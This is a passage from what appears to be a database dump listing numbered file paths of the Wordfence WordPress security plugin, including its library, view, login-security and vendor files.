ordfence/lib/cronview.php'),(5016,'wp-content/plugins/wordfence/lib/dashboard/widget_content_countries.php'),(5017,'wp-content/plugins/wordfence/lib/dashboard/widget_content_ips.php'),(5018,'wp-content/plugins/wordfence/lib/dashboard/widget_content_logins.php'),(5019,'wp-content/plugins/wordfence/lib/dashboard/widget_countries.php'),(5020,'wp-content/plugins/wordfence/lib/dashboard/widget_ips.php'),(5021,'wp-content/plugins/wordfence/lib/dashboard/widget_localattacks.php'),(5022,'wp-content/plugins/wordfence/lib/dashboard/widget_logins.php'),(5023,'wp-content/plugins/wordfence/lib/dashboard/widget_networkattacks.php'),(5024,'wp-content/plugins/wordfence/lib/dashboard/widget_notifications.php'),(5025,'wp-content/plugins/wordfence/lib/dashboard/widget_tdf.php'),(5026,'wp-content/plugins/wordfence/lib/dbview.php'),(5027,'wp-content/plugins/wordfence/lib/diffResult.php'),(5028,'wp-content/plugins/wordfence/lib/email_genericAlert.php'),(5029,'wp-content/plugins/wordfence/lib/email_newIssues.php'),(5030,'wp-content/plugins/wordfence/lib/email_unlockRequest.php'),(5031,'wp-content/plugins/wordfence/lib/email_unsubscribeRequest.php'),(5032,'wp-content/plugins/wordfence/lib/flags.php'),(5033,'wp-content/plugins/wordfence/lib/live_activity.php'),(5034,'wp-content/plugins/wordfence/lib/menu_dashboard.php'),(5035,'wp-content/plugins/wordfence/lib/menu_dashboard_options.php'),(5036,'wp-content/plugins/wordfence/lib/menu_firewall.php'),(5037,'wp-content/plugins/wordfence/lib/menu_firewall_blocking.php'),(5038,'wp-content/plugins/wordfence/lib/menu_firewall_blocking_options.php'),(5039,'wp-content/plugins/wordfence/lib/menu_firewall_waf.php'),(5040,'wp-content/plugins/wordfence/lib/menu_firewall_waf_options.php'),(5041,'wp-content/plugins/wordfence/lib/menu_options.php'),(5042,'wp-content/plugins/wordfence/lib/menu_scanner.php'),(5043,'wp-content/plugins/wordfence/lib/menu_scanner_credentials.php'),(5044,'wp-content/plugins/wordfence/lib/menu_scanner_options.php'),(5045,'wp-content/plugins/wordfence/lib/menu_support.php'),(5046,'wp-content/plugins/wordfence/lib/menu_tools.php'),(5047,'wp-content/plugins/wordfence/lib/menu_tools_diagnostic.php'),(5048,'wp-content/plugins/wordfence/lib/menu_tools_importExport.php'),(5049,'wp-content/plugins/wordfence/lib/menu_tools_livetraffic.php'),(5050,'wp-content/plugins/wordfence/lib/menu_tools_twoFactor.php'),(5051,'wp-content/plugins/wordfence/lib/menu_tools_whois.php'),(5052,'wp-content/plugins/wordfence/lib/menu_wordfence_central.php'),(5053,'wp-content/plugins/wordfence/lib/noc1.key'),(5054,'wp-content/plugins/wordfence/lib/rest-api/wfRESTAuthenticationController.php'),(5055,'wp-content/plugins/wordfence/lib/rest-api/wfRESTBaseController.php'),(5056,'wp-content/plugins/wordfence/lib/rest-api/wfRESTConfigController.php'),(5057,'wp-content/plugins/wordfence/lib/rest-api/wfRESTScanController.php'),(5058,'wp-content/plugins/wordfence/lib/sysinfo.php'),(5059,'wp-content/plugins/wordfence/lib/unknownFiles.php'),(5060,'wp-content/plugins/wordfence/lib/viewFullActivityLog.php'),(5061,'wp-content/plugins/wordfence/lib/wf503.php'),(5062,'wp-content/plugins/wordfence/lib/wfAPI.php'),(5063,'wp-content/plugins/wordfence/lib/wfActivityReport.php'),(5064,'wp-content/plugins/wordfence/lib/wfAdminNoticeQueue.php'),(5065,'wp-content/plugins/wordfence/lib/wfAlerts.php'),(5066,'wp-content/plugins/wordfence/lib/wfArray.php'),(5067,'wp-content/plugins/wordfence/lib/wfBrowscap.php'),(5068,'wp-content/plugins/wordfence/lib/wfBrowscapCache.php'),(5069,'wp-content/plugins/wordfence/lib/wfBulkCountries.php'),(5070,'wp-content/plugins/wordfence/lib/wfCache.php'),(5071,'wp-content/plugins/wordfence/lib/wfCentralAPI.php'),(5072,'wp-content/plugins/wordfence/lib/wfConfig.php'),(5073,'wp-content/plugins/wordfence/lib/wfCrawl.php'),(5074,'wp-content/plugins/wordfence/lib/wfCredentialsController.php'),(5075,'wp-content/plugins/wordfence/lib/wfCrypt.php'),(5076,'wp-content/plugins/wordfence/lib/wfDB.php'),(5077,'wp-content/plugins/wordfence/lib/wfDashboard.php'),(5078,'wp-content/plugins/wordfence/lib/wfDateLocalization.php'),(5079,'wp-content/plugins/wordfence/lib/wfDiagnostic.php'),(5080,'wp-content/plugins/wordfence/lib/wfDict.php'),(5081,'wp-content/plugins/wordfence/lib/wfDirectoryIterator.php'),(5082,'wp-content/plugins/wordfence/lib/wfHelperBin.php'),(5083,'wp-content/plugins/wordfence/lib/wfHelperString.php'),(5084,'wp-content/plugins/wordfence/lib/wfIPWhitelist.php'),(5085,'wp-content/plugins/wordfence/lib/wfImportExportController.php'),(5086,'wp-content/plugins/wordfence/lib/wfIssues.php'),(5087,'wp-content/plugins/wordfence/lib/wfJWT.php'),(5088,'wp-content/plugins/wordfence/lib/wfLockedOut.php'),(5089,'wp-content/plugins/wordfence/lib/wfLog.php'),(5090,'wp-content/plugins/wordfence/lib/wfMD5BloomFilter.php'),(5091,'wp-content/plugins/wordfence/lib/wfModuleController.php'),(5092,'wp-content/plugins/wordfence/lib/wfNotification.php'),(5093,'wp-content/plugins/wordfence/lib/wfOnboardingController.php'),(5094,'wp-content/plugins/wordfence/lib/wfPersistenceController.php'),(5095,'wp-content/plugins/wordfence/lib/wfRESTAPI.php'),(5096,'wp-content/plugins/wordfence/lib/wfScan.php'),(5097,'wp-content/plugins/wordfence/lib/wfScanEngine.php'),(5098,'wp-content/plugins/wordfence/lib/wfSchema.php'),(5099,'wp-content/plugins/wordfence/lib/wfStyle.php'),(5100,'wp-content/plugins/wordfence/lib/wfSupportController.php'),(5101,'wp-content/plugins/wordfence/lib/wfUnlockMsg.php'),(5102,'wp-content/plugins/wordfence/lib/wfUpdateCheck.php'),(5103,'wp-content/plugins/wordfence/lib/wfUtils.php'),(5104,'wp-content/plugins/wordfence/lib/wfVersionCheckController.php'),(5105,'wp-content/plugins/wordfence/lib/wfView.php'),(5106,'wp-content/plugins/wordfence/lib/wfViewResult.php'),(5107,'wp-content/plugins/wordfence/lib/wordfenceClass.php'),(5108,'wp-content/plugins/wordfence/lib/wordfenceConstants.php'),(5109,'wp-content/plugins/wordfence/lib/wordfenceHash.php'),(5110,'wp-content/plugins/wordfence/lib/wordfenceScanner.php'),(5111,'wp-content/plugins/wordfence/lib/wordfenceURLHoover.php'),(5112,'wp-content/plugins/wordfence/models/.htaccess'),(5113,'wp-content/plugins/wordfence/models/block/wfBlock.php'),(5114,'wp-content/plugins/wordfence/models/block/wfRateLimit.php'),(5115,'wp-content/plugins/wordfence/models/common/wfGeoIP2.php'),(5116,'wp-content/plugins/wordfence/models/common/wfTab.php'),(5117,'wp-content/plugins/wordfence/models/firewall/wfFirewall.php'),(5118,'wp-content/plugins/wordfence/models/page/wfPage.php'),(5119,'wp-content/plugins/wordfence/models/scanner/wfScanner.php'),(5120,'wp-content/plugins/wordfence/modules/login-security/classes/.htaccess'),(5121,'wp-content/plugins/wordfence/modules/login-security/classes/controller/ajax.php'),(5122,'wp-content/plugins/wordfence/modules/login-security/classes/controller/captcha.php'),(5123,'wp-content/plugins/wordfence/modules/login-security/classes/controller/cron.php'),(5124,'wp-content/plugins/wordfence/modules/login-security/classes/controller/db.php'),(5125,'wp-content/plugins/wordfence/modules/login-security/classes/controller/notices.php'),(5126,'wp-content/plugins/wordfence/modules/login-security/classes/controller/permissions.php'),(5127,'wp-content/plugins/wordfence/modules/login-security/classes/controller/settings.php'),(5128,'wp-content/plugins/wordfence/modules/login-security/classes/controller/support.php'),(5129,'wp-content/plugins/wordfence/modules/login-security/classes/controller/time.php'),(5130,'wp-content/plugins/wordfence/modules/login-security/classes/controller/totp.php'),(5131,'wp-content/plugins/wordfence/modules/login-security/classes/controller/users.php'),(5132,'wp-content/plugins/wordfence/modules/login-security/classes/controller/whitelist.php'),(5133,'wp-content/plugins/wordfence/modules/login-security/classes/controller/wordfencels.php'),(5134,'wp-content/plugins/wordfence/modules/login-security/classes/model/asset.php'),(5135,'wp-content/plugins/wordfence/modules/login-security/classes/model/compat.php'),(5136,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/base2n.php'),(5137,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/jwt.php'),(5138,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto/symmetric.php'),(5139,'wp-content/plugins/wordfence/modules/login-security/classes/model/crypto.php'),(5140,'wp-content/plugins/wordfence/modules/login-security/classes/model/ip.php'),(5141,'wp-content/plugins/wordfence/modules/login-security/classes/model/notice.php'),(5142,'wp-content/plugins/wordfence/modules/login-security/classes/model/request.php'),(5143,'wp-content/plugins/wordfence/modules/login-security/classes/model/settings/db.php'),(5144,'wp-content/plugins/wordfence/modules/login-security/classes/model/settings/wpoptions.php'),(5145,'wp-content/plugins/wordfence/modules/login-security/classes/model/settings.php'),(5146,'wp-content/plugins/wordfence/modules/login-security/classes/model/text/html.php'),(5147,'wp-content/plugins/wordfence/modules/login-security/classes/model/text/javascript.php'),(5148,'wp-content/plugins/wordfence/modules/login-security/classes/model/tokenbucket.php'),(5149,'wp-content/plugins/wordfence/modules/login-security/classes/model/view/tab.php'),(5150,'wp-content/plugins/wordfence/modules/login-security/classes/model/view/title.php'),(5151,'wp-content/plugins/wordfence/modules/login-security/classes/model/view.php'),(5152,'wp-content/plugins/wordfence/modules/login-security/css/admin-global.1592338782.css'),(5153,'wp-content/plugins/wordfence/modules/login-security/css/admin.1592338782.css'),(5154,'wp-content/plugins/wordfence/modules/login-security/css/colorbox.1592338782.css'),(5155,'wp-content/plugins/wordfence/modules/login-security/css/font-awesome.1592338782.css'),(5156,'wp-content/plugins/wordfence/modules/login-security/css/ionicons.1592338782.css'),(5157,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui-timepicker-addon.1592338782.css'),(5158,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.min.1592338782.css'),(5159,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.structure.min.1592338782.css'),(5160,'wp-content/plugins/wordfence/modules/login-security/css/jquery-ui.theme.min.1592338782.css'),(5161,'wp-content/plugins/wordfence/modules/login-security/css/login.1592338782.css'),(5162,'wp-content/plugins/wordfence/modules/login-security/img/header.svg'),(5163,'wp-content/plugins/wordfence/modules/login-security/img/lightbox-controls.png'),(5164,'wp-content/plugins/wordfence/modules/login-security/img/loading.gif'),(5165,'wp-content/plugins/wordfence/modules/login-security/img/loading_background.png'),(5166,'wp-content/plugins/wordfence/modules/login-security/img/menu.svg'),(5167,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_444444_256x240.png'),(5168,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_555555_256x240.png'),(5169,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777620_256x240.png'),(5170,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_777777_256x240.png'),(5171,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_cc0000_256x240.png'),(5172,'wp-content/plugins/wordfence/modules/login-security/img/ui-icons_ffffff_256x240.png'),(5173,'wp-content/plugins/wordfence/modules/login-security/js/admin-global.1592338782.js'),(5174,'wp-content/plugins/wordfence/modules/login-security/js/admin.1592338782.js'),(5175,'wp-content/plugins/wordfence/modules/login-security/js/jquery-ui-timepicker-addon.1592338782.js'),(5176,'wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.1592338782.js'),(5177,'wp-content/plugins/wordfence/modules/login-security/js/jquery.colorbox.min.1592338782.js'),(5178,'wp-content/plugins/wordfence/modules/login-security/js/jquery.qrcode.min.1592338782.js'),(5179,'wp-content/plugins/wordfence/modules/login-security/js/jquery.tmpl.min.1592338782.js'),(5180,'wp-content/plugins/wordfence/modules/login-security/js/login.1592338782.js'),(5181,'wp-content/plugins/wordfence/modules/login-security/views/.htaccess'),(5182,'wp-content/plugins/wordfence/modules/login-security/views/common/modal-prompt.php'),(5183,'wp-content/plugins/wordfence/modules/login-security/views/email/login-verification.php'),(5184,'wp-content/plugins/wordfence/modules/login-security/views/manage/activate.php'),(5185,'wp-content/plugins/wordfence/modules/login-security/views/manage/code.php'),(5186,'wp-content/plugins/wordfence/modules/login-security/views/manage/deactivate.php'),(5187,'wp-content/plugins/wordfence/modules/login-security/views/manage/regenerate.php'),(5188,'wp-content/plugins/wordfence/modules/login-security/views/onboarding/standalone-header.php'),(5189,'wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha-threshold.php'),(5190,'wp-content/plugins/wordfence/modules/login-security/views/options/option-captcha.php'),(5191,'wp-content/plugins/wordfence/modules/login-security/views/options/option-ip-source.php'),(5192,'wp-content/plugins/wordfence/modules/login-security/views/options/option-label.php'),(5193,'wp-content/plugins/wordfence/modules/login-security/views/options/option-require-2fa.php'),(5194,'wp-content/plugins/wordfence/modules/login-security/views/options/option-select.php'),(5195,'wp-content/plugins/wordfence/modules/login-security/views/options/option-switch.php'),(5196,'wp-content/plugins/wordfence/modules/login-security/views/options/option-text.php'),(5197,'wp-content/plugins/wordfence/modules/login-security/views/options/option-textarea.php'),(5198,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-boolean-switch.php'),(5199,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-multiple.php'),(5200,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-segmented.php'),(5201,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-select.php'),(5202,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-sub.php'),(5203,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled-textarea.php'),(5204,'wp-content/plugins/wordfence/modules/login-security/views/options/option-toggled.php'),(5205,'wp-content/plugins/wordfence/modules/login-security/views/options/option-token.php'),(5206,'wp-content/plugins/wordfence/modules/login-security/views/page/manage.php'),(5207,'wp-content/plugins/wordfence/modules/login-security/views/page/page.php'),(5208,'wp-content/plugins/wordfence/modules/login-security/views/page/section-title.php'),(5209,'wp-content/plugins/wordfence/modules/login-security/views/page/settings.php'),(5210,'wp-content/plugins/wordfence/modules/login-security/views/page/tabbar.php'),(5211,'wp-content/plugins/wordfence/modules/login-security/views/settings/options.php'),(5212,'wp-content/plugins/wordfence/modules/login-security/views/settings/user-stats.php'),(5213,'wp-content/plugins/wordfence/modules/login-security/wordfence-login-security.php'),(5214,'wp-content/plugins/wordfence/readme.txt'),(5215,'wp-content/plugins/wordfence/tmp/.htaccess'),(5216,'wp-content/plugins/wordfence/vendor/.htaccess'),(5217,'wp-content/plugins/wordfence/vendor/autoload.php'),(5218,'wp-content/plugins/wordfence/vendor/composer/ClassLoader.php'),(5219,'wp-content/plugins/wordfence/vendor/composer/LICENSE'),(5220,'wp-content/plugins/wordfence/vendor/composer/autoload_classmap.php'),(5221,'wp-content/plugins/wordfence/vendor/composer/autoload_namespaces.php'),(5222,'wp-content/plugins/wordfence/vendor/composer/autoload_psr4.php'),(5223,'wp-content/plugins/wordfence/vendor/composer/autoload_real.php'),(5224,'wp-content/plugins/wordfence/vendor/composer/autoload_static.php'),(5225,'wp-content/plugins/wordfence/vendor/composer/ca-bundle/LICENSE'),(5226,'wp-content/plugins/wordfence/vendor/composer/ca-bundle/res/cacert.pem'),(5227,'wp-content/plugins/wordfence/vendor/composer/ca-bundle/src/CaBundle.php'),(5228,'wp-content/plugins/wordfence/vendor/composer/installed.json'),(5229,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/.gitmodules'),(5230,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/.php_cs'),(5231,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/LICENSE'),(5232,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Database/Reader.php'),(5233,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AddressNotFoundException.php'),(5234,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/AuthenticationException.php'),(5235,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/GeoIp2Exception.php'),(5236,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/HttpException.php'),(5237,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/InvalidRequestException.php'),(5238,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Exception/OutOfQueriesException.php'),(5239,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AbstractModel.php'),(5240,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/AnonymousIp.php'),(5241,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Asn.php'),(5242,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/City.php'),(5243,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/ConnectionType.php'),(5244,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Country.php'),(5245,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Domain.php'),(5246,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Enterprise.php'),(5247,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Insights.php'),(5248,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Model/Isp.php'),(5249,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/ProviderInterface.php'),(5250,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractPlaceRecord.php'),(5251,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/AbstractRecord.php'),(5252,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/City.php'),(5253,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Continent.php'),(5254,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Country.php'),(5255,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Location.php'),(5256,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/MaxMind.php'),(5257,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Postal.php'),(5258,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/RepresentedCountry.php'),(5259,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Subdivision.php'),(5260,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/Record/Traits.php'),(5261,'wp-content/plugins/wordfence/vendor/geoip2/geoip2/src/WebService/Client.php'),(5262,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/LICENSE'),(5263,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/AuthenticationException.php'),(5264,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/HttpException.php'),(5265,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InsufficientFundsException.php'),(5266,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidInputException.php'),(5267,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/InvalidRequestException.php'),(5268,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/IpAddressNotFoundException.php'),(5269,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/PermissionRequiredException.php'),(5270,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/Exception/WebServiceException.php'),(5271,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Client.php'),(5272,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/CurlRequest.php'),(5273,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/Request.php'),(5274,'wp-content/plugins/wordfence/vendor/maxmind/web-service-common/src/WebService/Http/RequestFactory.php'),(5275,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/LICENSE'),(5276,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/autoload.php'),(5277,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Decoder.php'),(5278,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/InvalidDatabaseException.php'),(5279,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Metadata.php'),(5280,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader/Util.php'),(5281,'wp-content/plugins/wordfence/vendor/maxmind-db/reader/src/MaxMind/Db/Reader.php'),(5282,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/cacert.pem'),(5283,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/falsepositive.key'),(5284,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/init.php'),(5285,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/config.php'),(5286,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/http.php'),(5287,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/json.php'),(5288,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/lexer.php'),(5289,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/parser.php'),(5290,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/parser/sqli.php'),(5291,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/request.php'),(5292,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/rules.php'),(5293,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/file.php'),(5294,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage/mysql.php'),(5295,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/storage.php'),(5296,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/utils.php'),(5297,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/view.php'),(5298,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/waf.php'),(5299,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/lib/xmlrpc.php'),(5300,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/rules.key'),(5301,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-blacklist.php'),(5302,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403-roadblock.php'),(5303,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/403.php'),(5304,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503-lockout.php'),(5305,'wp-content/plugins/wordfence/vendor/wordfence/wf-waf/src/views/503.php'),(5306,'wp-content/plugins/wordfence/views/.htaccess'),(5307,'wp-content/plugins/wordfence/views/blocking/block-list.php'),(5308,'wp-content/plugins/wordfence/views/blocking/blocking-create.php'),(5309,'wp-content/plugins/wordfence/views/blocking/blocking-status.php'),(5310,'wp-content/plugins/wordfence/views/blocking/country-block-map.php'),(5311,'wp-content/plugins/wordfence/views/blocking/country-modal.php'),(5312,'wp-content/plugins/wordfence/views/blocking/option-bypass-cookie.php'),(5313,'wp-content/plugins/wordfence/views/blocking/option-bypass-redirect.php'),(5314,'wp-content/plugins/wordfence/views/blocking/options-group-advanced-country.php'),(5315,'wp-content/plugins/wordfence/views/common/block-navigation-option.php'),(5316,'wp-content/plugins/wordfence/views/common/indeterminate-progress.php'),(5317,'wp-content/plugins/wordfence/views/common/license.php'),(5318,'wp-content/plugins/wordfence/views/common/modal-prompt.php'),(5319,'wp-content/plugins/wordfence/views/common/page-fixed-tabbar.php'),(5320,'wp-content/plugins/wordfence/views/common/page-help.php'),(5321,'wp-content/plugins/wordfence/views/common/page-tabbar.php'),(5322,'wp-content/plugins/wordfence/views/common/page-title.php'),(5323,'wp-content/plugins/wordfence/views/common/section-subtitle.php'),(5324,'wp-content/plugins/wordfence/views/common/section-title.php'),(5325,'wp-content/plugins/wordfence/views/common/status-circular.php'),(5326,'wp-content/plugins/wordfence/views/common/status-critical.php'),(5327,'wp-content/plugins/wordfence/views/common/status-detail.php'),(5328,'wp-content/plugins/wordfence/views/common/status-tooltip.php'),(5329,'wp-content/plugins/wordfence/views/common/status-warning.php'),(5330,'wp-content/plugins/wordfence/views/common/unsubscribe.php'),(5331,'wp-content/plugins/wordfence/views/dashboard/global-status.php'),(5332,'wp-content/plugins/wordfence/views/dashboard/option-howgetips.php'),(5333,'wp-content/plugins/wordfence/views/dashboard/options-group-alert.php'),(5334,'wp-content/plugins/wordfence/views/dashboard/options-group-dashboard.php'),(5335,'wp-content/plugins/wordfence/views/dashboard/options-group-email-summary.php'),(5336,'wp-content/plugins/wordfence/views/dashboard/options-group-general.php'),(5337,'wp-content/plugins/wordfence/views/dashboard/options-group-import.php'),(5338,'wp-content/plugins/wordfence/views/dashboard/options-group-license.php'),(5339,'wp-content/plugins/wordfence/views/dashboard/options-group-view-customization.php'),(5340,'wp-content/plugins/wordfence/views/dashboard/status-payment-expiring.php'),(5341,'wp-content/plugins/wordfence/views/dashboard/status-renewing.php'),(5342,'wp-content/plugins/wordfence/views/gdpr/banner.php'),(5343,'wp-content/plugins/wordfence/views/gdpr/disabled-overlay.php'),(5344,'wp-content/plugins/wordfence/views/onboarding/banner.php'),(5345,'wp-content/plugins/wordfence/views/onboarding/disabled-overlay.php'),(5346,'wp-content/plugins/wordfence/views/onboarding/fresh-install.php'),(5347,'wp-content/plugins/wordfence/views/onboarding/modal-final-attempt.php'),(5348,'wp-content/plugins/wordfence/views/onboarding/overlay.php'),(5349,'wp-content/plugins/wordfence/views/onboarding/plugin-header.php'),(5350,'wp-content/plugins/wordfence/views/onboarding/tour-overlay.php'),(5351,'wp-content/plugins/wordfence/views/options/block-all-options-controls.php'),(5352,'wp-content/plugins/wordfence/views/options/block-controls.php'),(5353,'wp-content/plugins/wordfence/views/options/option-label.php'),(5354,'wp-content/plugins/wordfence/views/options/option-select.php'),(5355,'wp-content/plugins/wordfence/views/options/option-switch.php'),(5356,'wp-content/plugins/wordfence/views/options/option-text.php'),(5357,'wp-content/plugins/wordfence/views/options/option-textarea.php'),(5358,'wp-content/plugins/wordfence/views/options/option-toggled-boolean-switch.php'),(5359,'wp-content/plugins/wordfence/views/options/option-toggled-multiple.php'),(5360,'wp-content/plugins/wordfence/views/options/option-toggled-segmented.php'),(5361,'wp-content/plugins/wordfence/views/options/option-toggled-select.php'),(5362,'wp-content/plugins/wordfence/views/options/option-toggled-sub.php'),(5363,'wp-content/plugins/wordfence/views/options/option-toggled-textarea.php'),(5364,'wp-content/plugins/wordfence/views/options/option-toggled.php'),(5365,'wp-content/plugins/wordfence/views/options/option-token.php'),(5366,'wp-content/plugins/wordfence/views/options/options-title.php'),(5367,'wp-content/plugins/wordfence/views/reports/activity-report-email-inline.php'),(5368,'wp-content/plugins/wordfence/views/reports/activity-report.php'),(5369,'wp-content/plugins/wordfence/views/scanner/issue-base.php'),(5370,'wp-content/plugins/wordfence/views/scanner/issue-checkGSB.php'),(5371,'wp-content/plugins/wordfence/views/scanner/issue-checkHowGetIPs.php'),(5372,'wp-content/plugins/wordfence/views/scanner/issue-checkSpamIP.php'),(5373,'wp-content/plugins/wordfence/views/scanner/issue-commentBadURL.php'),(5374,'wp-content/plugins/wordfence/views/scanner/issue-configReadable.php'),(5375,'wp-content/plugins/wordfence/views/scanner/issue-control-edit-comment.php'),(5376,'wp-content/plugins/wordfence/views/scanner/issue-control-edit-post.php'),(5377,'wp-content/plugins/wordfence/views/scanner/issue-control-edit-user.php'),(5378,'wp-content/plugins/wordfence/views/scanner/issue-control-hide-file.php'),(5379,'wp-content/plugins/wordfence/views/scanner/issue-control-ignore.php'),(5380,'wp-content/plugins/wordfence/views/scanner/issue-control-repair.php'),(5381,'wp-content/plugins/wordfence/views/scanner/issue-control-show-details.php'),(5382,'wp-content/plugins/wordfence/views/scanner/issue-coreUnknown.php'),(5383,'wp-content/plugins/wordfence/views/scanner/issue-database.php'),(5384,'wp-content/plugins/wordfence/views/scanner/issue-diskSpace.php'),(5385,'wp-content/plugins/wordfence/views/scanner/issue-easyPassword.php'),(5386,'wp-content/plugins/wordfence/views/scanner/issue-file.php'),(5387,'wp-content/plugins/wordfence/views/scanner/issue-geoipSupport.php'),(5388,'wp-content/plugins/wordfence/views/scanner/issue-knownfile.php'),(5389,'wp-content/plugins/wordfence/views/scanner/issue-optionBadURL.php'),(5390,'wp-content/plugins/wordfence/views/scanner/issue-postBadTitle.php'),(5391,'wp-content/plugins/wordfence/views/scanner/issue-postBadURL.php'),(5392,'wp-content/plugins/wordfence/views/scanner/issue-publiclyAccessible.php'),(5393,'wp-content/plugins/wordfence/views/scanner/issue-skippedPaths.php'),(5394,'wp-content/plugins/wordfence/views/scanner/issue-spamvertizeCheck.php'),(5395,'wp-content/plugins/wordfence/views/scanner/issue-suspiciousAdminUsers.php'),(5396,'wp-content/plugins/wordfence/views/scanner/issue-timelimit.php'),(5397,'wp-content/plugins/wordfence/views/scanner/issue-wafStatus.php'),(5398,'wp-content/plugins/wordfence/views/scanner/issue-wfPluginAbandoned.php'),(5399,'wp-content/plugins/wordfence/views/scanner/issue-wfPluginRemoved.php'),(5400,'wp-content/plugins/wordfence/views/scanner/issue-wfPluginUpgrade.php'),(5401,'wp-content/plugins/wordfence/views/scanner/issue-wfPluginVulnerable.php'),(5402,'wp-content/plugins/wordfence/views/scanner/issue-wfThemeUpgrade.php'),(5403,'wp-content/plugins/wordfence/views/scanner/issue-wfUpgrade.php'),(5404,'wp-content/plugins/wordfence/views/scanner/issue-wpscan_directoryList.php'),(5405,'wp-content/plugins/wordfence/views/scanner/issue-wpscan_fullPathDiscl.php'),(5406,'wp-content/plugins/wordf